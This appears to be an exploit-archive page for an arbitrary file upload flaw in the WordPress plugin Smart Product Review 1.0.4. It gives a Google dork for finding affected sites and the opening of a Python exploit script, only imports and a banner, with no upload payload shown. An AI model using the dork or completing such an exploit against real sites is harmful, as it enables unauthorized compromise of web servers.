Exploits / Vulnerability Discovered : 2021-11-17 |
Type : webapps |
Platform : php
This exploit / vulnerability Wordpress plugin smart product review 1.0.4 arbitrary file upload is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
# Google Dork: inurl: /wp-content/plugins/smart-product-review/
# Date: 16/11/2021
# Exploit Author: Keyvan Hardani
# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
# Version: <= 1.0.4
# Tested on: Kali Linux
import os.path
from os import path
import json
import requests;
import time
import sys
def banner():
animation = "|/-\\"
for i in range(20):
time.sleep(0.1)
sys.stdout.write("\r" + animation[i % len(animation)])
sys.stdout.flush()
#do something
print("Smart Product Review 1.0.4 - Arbitrary File Upload")
print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")